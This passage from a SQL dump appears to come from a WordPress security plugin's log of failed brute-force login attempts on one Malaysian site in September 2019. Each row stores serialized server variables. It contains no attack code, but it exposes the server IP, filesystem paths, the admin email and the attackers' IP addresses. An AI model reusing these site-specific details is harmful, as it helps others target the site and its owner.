08:13:07',18255008,19553200,'https://bintara.com.my/xmlrpc.php',1,0,'164.132.100.13'),(24020,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"55407\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9ED@BXE2JRepjOtvmwtAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568621583.6146\";s:12:\"REQUEST_TIME\";s:10:\"1568621583\";}}','notice','2019-09-16 08:13:05','2019-09-16 08:13:04',17741264,19231808,'https://bintara.com.my/wp-login.php',1,0,'164.132.100.13'),(24019,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"43892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9D3WCCaIOMm5l5jJE62AAAAQE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568621533.272\";s:12:\"REQUEST_TIME\";s:10:\"1568621533\";}}','notice','2019-09-16 08:12:14','2019-09-16 08:12:13',18256192,19555464,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(24018,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"43256\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9D2@BXE2JRepjOtvmwpAAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568621531.2049\";s:12:\"REQUEST_TIME\";s:10:\"1568621531\";}}','notice','2019-09-16 08:12:12','2019-09-16 08:12:11',17904936,19229888,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(24017,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"43256\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9D2@BXE2JRepjOtvmwpAAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568621531.2049\";s:12:\"REQUEST_TIME\";s:10:\"1568621531\";}}','notice','2019-09-16 08:12:12','2019-09-16 08:12:11',17743392,19229888,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(24015,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.241.220.227\";s:11:\"REMOTE_PORT\";s:5:\"56322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9ChQavjo3v4tJT4rviXAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568621189.2723\";s:12:\"REQUEST_TIME\";s:10:\"1568621189\";}}','notice','2019-09-16 08:06:30','2019-09-16 08:06:29',17738280,19229792,'https://bintara.com.my/wp-login.php',1,0,'192.241.220.227'),(24016,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.241.220.227\";s:11:\"REMOTE_PORT\";s:5:\"57860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9CnAavjo3v4tJT4rviawAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568621212.1751\";s:12:\"REQUEST_TIME\";s:10:\"1568621212\";}}','notice','2019-09-16 08:06:53','2019-09-16 08:06:52',18257176,19556480,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.220.227'),(24385,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"91.215.155.37\";s:11:\"REMOTE_PORT\";s:5:\"35498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBdrtVIJ66zPtjtaf38sAAAAVA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568693678.3915\";s:12:\"REQUEST_TIME\";s:10:\"1568693678\";}}','notice','2019-09-17 04:14:40','2019-09-17 04:14:38',17741104,19231784,'https://bintara.com.my/wp-login.php',1,0,'91.215.155.37'),(24386,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"91.215.155.37\";s:11:\"REMOTE_PORT\";s:5:\"37340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBdstVIJ66zPtjtaf38sQAAAUk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568693682.2995\";s:12:\"REQUEST_TIME\";s:10:\"1568693682\";}}','notice','2019-09-17 04:14:43','2019-09-17 04:14:42',18257152,19557232,'https://bintara.com.my/xmlrpc.php',1,0,'91.215.155.37'),(23820,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"46438\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3XKaPPIU0WjPk-sOt@XQAAAZg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568528169.4194\";s:12:\"REQUEST_TIME\";s:10:\"1568528169\";}}','notice','2019-09-15 06:16:10','2019-09-15 